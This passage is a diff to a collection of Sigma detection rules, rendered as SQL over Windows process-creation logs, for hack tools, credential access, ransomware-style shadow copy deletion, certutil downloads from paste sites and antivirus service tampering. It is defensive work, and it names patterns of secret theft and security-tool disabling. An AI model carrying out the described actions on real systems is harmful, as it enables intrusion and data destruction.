%' ESCAPE '\\' OR 
CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", - "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Legitimate use" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" - ], - "filename": "proc_creation_win_pua_frp.yml" - }, - { - "title": "Potential Maze Ransomware Activity", - "id": 
"29fd07fc-9cfd-4331-b7fd-cc18dfa21052", - "status": "test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "Port 
Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of Sysinternals 
ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR 
CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" - }, - { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by 
having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND 
((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" ], "level": 
"high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" - }, - { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", - "status": "experimental", - "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1489" - ], - "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! 
Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE 
'%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE 
'%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE 